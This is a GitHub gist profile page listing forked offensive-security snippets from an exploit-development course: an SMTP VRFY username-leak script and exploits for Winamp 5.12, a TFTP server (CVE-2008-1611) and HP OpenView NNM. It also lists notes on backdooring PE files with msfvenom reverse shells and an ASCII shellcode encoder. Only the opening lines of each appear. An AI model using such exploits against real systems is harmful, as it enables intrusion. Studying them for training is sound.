Skip to content

Instantly share code, notes, and snippets.

View fl3xu5's full-sized avatar

fl3xu5

4 followers · 16 following
View GitHub Profile
@fl3xu5
fl3xu5 / smtpvrfy.py
Created July 17, 2017 11:34 — forked from mgeeky/smtpvrfy.py
SMTP VRFY python tool intended to check whether SMTP server is leaking usernames.
#!/usr/bin/python
#
# Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it.
#
# Mariusz B., 2016
#
import socket
import sys
@fl3xu5
fl3xu5 / msfvenom-reverse-tcp-WaitForSingleObject.md
Created July 17, 2017 11:20 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@fl3xu5
fl3xu5 / winamp-5.12-unc-exploit.pl
Created July 17, 2017 08:55 — forked from mgeeky/winamp-5.12-unc-exploit.pl
My version of the Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit, for occassion of OSCE/CTP course. Original PoC by Umesh Wanve ([email protected]).
#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# Original Poc by Umesh Wanve ([email protected])
# Exploit crafted by Mariusz B. / mgeeky (for occassion of OSCE/CTP, 2017)
# ====================================================================
$start = "[playlist]\r\nFile1=\\\\";
$egg = "T00WT00W";
@fl3xu5
fl3xu5 / cve2008-1611.py
Created July 17, 2017 08:53 — forked from mgeeky/cve2008-1611.py
Exploit for the CVE-2008-1611 TFTP Server 1.4 ST RRQ/WRQ packet's filename stack-based overflow with SEH overwrite.
#!/usr/bin/python
import socket
import struct
HOST = '192.168.1.100'
PORT = 69
def send_packet(filename):
#
@fl3xu5
fl3xu5 / hp-openview-exploit.py
Created July 17, 2017 08:50 — forked from mgeeky/hp-openview-exploit.py
HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'
import struct
import socket
HOST = '192.168.XXX.YYY'
PORT = 7510
@fl3xu5
fl3xu5 / ascii-shellcode-encoder.py
Created July 17, 2017 08:44 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving